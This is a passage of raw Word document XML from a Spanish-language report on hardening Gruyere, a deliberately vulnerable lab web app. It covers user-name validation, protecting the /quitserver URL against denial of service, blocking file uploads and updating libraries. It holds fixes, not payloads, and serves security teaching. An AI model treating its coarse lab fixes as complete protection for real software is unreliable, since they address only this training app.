          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54A8B2C1" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">                        self._CreateCookie('GRUYERE', uid))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1FA225" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66DE8588" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">                    self._DoHome(cookie, specials, params, new_cookie_text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549C31B8" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01B59012" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">                    return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072C41BE" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D64B7F7" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">            message = 'Invalid user name or password.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E2C261" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF245C5" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6147F175" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="686B422C" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">            message = 'User name can only contain letters and numbers, and cannot contain "..".'  # muestra un mensaje de error si el nombre de usuario contiene caracteres no permitidos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2006F6C3" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75D6873F" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    specials['_message'] = message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31558CD1" w14:textId="4888B60B" w:rsidR="00BB7D5C" w:rsidRPr="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="420F5FFE" w14:textId="77777777" w:rsidR="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    self._SendTemplateResponse('/login.gtl', specials, params)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBC9FDC" w14:textId="424D88EC" w:rsidR="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338AA2F2" w14:textId="6899F641" w:rsidR="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7588FB5E" w14:textId="229B7B95" w:rsidR="00BB7D5C" w:rsidRDefault="00BB7D5C" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D5C">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D337535" wp14:editId="32F9CD57">
            <wp:extent cx="5400040" cy="541147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5411470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E0B5EE" w14:textId="64B04B24" w:rsidR="00C05C53" w:rsidRDefault="00C05C53" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A3FA28E" w14:textId="7A1AEC81" w:rsidR="00C05C53" w:rsidRDefault="00C05C53" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>Impidiendo así que hagan login:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006427D9" w14:textId="75F0139C" w:rsidR="00C05C53" w:rsidRDefault="00C05C53" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C05C53">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F8A2F0C" wp14:editId="6FD27D77">
            <wp:extent cx="5400040" cy="433006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00040" cy="4330065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="162D4687" w14:textId="61F77073" w:rsidR="00C05C53" w:rsidRDefault="00C05C53" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA1C996" w14:textId="3978A203" w:rsidR="00C05C53" w:rsidRDefault="00C05C53" w:rsidP="00BB7D5C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00C05C53">
        <w:t>Ahora modificaré el método _DoSaveprofile</w:t>
      </w:r>
      <w:r>
        <w:t>, impidiendo que se puedan registrar, añadiendo esta línea al principio de la clase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2238DD35" w14:textId="5D561A71" w:rsidR="00C05C53" w:rsidRDefault="00C05C53" w:rsidP="00C05C53">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C05C53">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>‘import re’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B414D06" w14:textId="2334AF35" w:rsidR="00C05C53" w:rsidRDefault="00C05C53" w:rsidP="00C05C53">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3732376E" w14:textId="5B6848E4" w:rsidR="00C05C53" w:rsidRPr="00C05C53" w:rsidRDefault="00C05C53" w:rsidP="00C05C53">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00C05C53">
        <w:t>Y este en el método:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC143D2" w14:textId="453806FB" w:rsidR="00C05C53" w:rsidRPr="00C05C53" w:rsidRDefault="00C05C53" w:rsidP="00C05C53">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C05C53">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00C05C53">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve"> if not re.match(r'^[a-zA-Z0-9_]+$', uid):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E26086" w14:textId="77777777" w:rsidR="00C05C53" w:rsidRDefault="00C05C53" w:rsidP="006E229F">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C05C53">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        message = 'Invalid user name. User name must only contain letters, numbers, and underscores.' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117094EB" w14:textId="270DA4A9" w:rsidR="00C05C53" w:rsidRDefault="00C05C53" w:rsidP="00C05C53">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51729E17" w14:textId="1A0705DD" w:rsidR="00C05C53" w:rsidRDefault="006E229F" w:rsidP="00C05C53">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Quedando así:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A78BD23" w14:textId="1310F22D" w:rsidR="006E229F" w:rsidRPr="006E229F" w:rsidRDefault="006E229F" w:rsidP="00C05C53">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="006E229F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C27747B" wp14:editId="6B66BE34">
            <wp:extent cx="5400040" cy="541147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00040" cy="5411470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F5741E" w14:textId="4083AA74" w:rsidR="00D33545" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc127812518" w:history="1">
        <w:bookmarkStart w:id="78" w:name="_Toc128034186"/>
        <w:r w:rsidR="00D33545" w:rsidRPr="00610E00">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Negación de servicio -&gt;</w:t>
        </w:r>
        <w:bookmarkEnd w:id="78"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="162F09D2" w14:textId="2598836D" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF"/>
    <w:p w14:paraId="0B6749DC" w14:textId="701AD351" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5029B92B" w14:textId="0F9D1928" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>En este caso vamos a ver poque pasa esto, gruyere incluye una lista de url protegidas en el servidor, dentro de gruyere.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DAC07E" w14:textId="6F8628C7" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00975DCF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69174AF4" wp14:editId="673BD093">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D7490A" w14:textId="4619CA17" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27DA0C9F" w14:textId="07D26F83" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Para resolver esto añadiré la URL /quitserver:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0C9ACE" w14:textId="119B9CBE" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19D8D894" w14:textId="263B2D0E" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00975DCF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EB37344" wp14:editId="16E01E3C">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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0040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="473C3FA3" w14:textId="6D6229FA" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="691F7E0C" w14:textId="30E059B2" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Debido a este código gruyere devolverá “solicitud no valida”, también en gruyere.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DDDEBA" w14:textId="3FB64FF9" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5026EB75" w14:textId="1D7E7BA1" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="003F1A6A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="776996E1" wp14:editId="4AEF74AA">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="185994BA" w14:textId="772DBB16" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Tendríamos que añadir las páginas que no quieres que sean accesibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306F2325" w14:textId="32A40880" w:rsidR="0079789E" w:rsidRDefault="0079789E" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E6E9F8" w14:textId="2A09933D" w:rsidR="0079789E" w:rsidRDefault="0079789E" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="0079789E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53780653" wp14:editId="4C5D155E">
            <wp:extent cx="5400040" cy="5411470"/>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5411470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6247B4" w14:textId="7165953C" w:rsidR="0079789E" w:rsidRDefault="0079789E" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="611B1E9F" w14:textId="66BC8B88" w:rsidR="0079789E" w:rsidRDefault="0079789E" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora podemos ver que no es una página valida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F14CE3" w14:textId="77777777" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="666ABCCE" w14:textId="77777777" w:rsidR="00607ECF" w:rsidRPr="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A68F427" w14:textId="176B4394" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF"/>
    <w:p w14:paraId="090C3C37" w14:textId="77DB494E" w:rsidR="00607ECF" w:rsidRPr="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A464DD" w14:textId="77777777" w:rsidR="00607ECF" w:rsidRPr="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70B017A2" w14:textId="2E878F66" w:rsidR="00607ECF" w:rsidRDefault="00607ECF" w:rsidP="00607ECF">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A10F729" w14:textId="02BE526C" w:rsidR="00D33545" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc127812521" w:history="1">
        <w:bookmarkStart w:id="79" w:name="_Toc128034187"/>
        <w:r w:rsidR="00D33545" w:rsidRPr="00610E00">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:t>Code execution</w:t>
        </w:r>
        <w:bookmarkEnd w:id="79"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56A27D0C" w14:textId="100F8694" w:rsidR="00D33545" w:rsidRDefault="00D33545" w:rsidP="00D33545">
      <w:pPr>
        <w:pStyle w:val="TDC2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="660"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427B8F9D" w14:textId="52250692" w:rsidR="002A0D7B" w:rsidRDefault="00E00D39" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Para defender nos de esta vulnerabilidad, simplemente tenemos que impedir que se puedan subir ficheros de cualquier tipo al servidor, esto ya está documentado en, File Upload XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7179FA2F" w14:textId="42D0CEC8" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F999563" w14:textId="4B79DA60" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CBB704A" w14:textId="17856416" w:rsidR="008A7268" w:rsidRDefault="008A7268">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc128034188"/>
      <w:r>
        <w:t>Otras recomendaciones -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="6476FDEC" w14:textId="50D6A4E5" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5580CED7" w14:textId="6C341A83" w:rsidR="008A7268" w:rsidRDefault="00D911EB" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Además</w:t>
      </w:r>
      <w:r w:rsidR="008A7268">
        <w:t xml:space="preserve"> de todas las vulnerabilidades expuestas anteriormente, era conveniente actualizar todas las librerías que usa la aplicación web, como por ejemplo actualizar Python a su última versión, con eso se podrán corregir futuras vulnerabilidades, entiendo que es un trabajo arduo pues habría que cambiar todo del código de la aplicación, pero sería una aplicación más segura.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DDFF16" w14:textId="425ED7D6" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B8B0FCC" w14:textId="6B824D73" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E21BBC" w14:textId="07F4A77F" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FCA55C1" w14:textId="0EA0670C" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A9DF5DA" w14:textId="55EE0F96" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D8CCA7" w14:textId="2F5CC6A8" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="153DF94B" w14:textId="3214B7EC" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FE09487" w14:textId="29B2EF2A" w:rsidR="008A7268" w:rsidRDefault="008A7268" w:rsidP="008A7268">
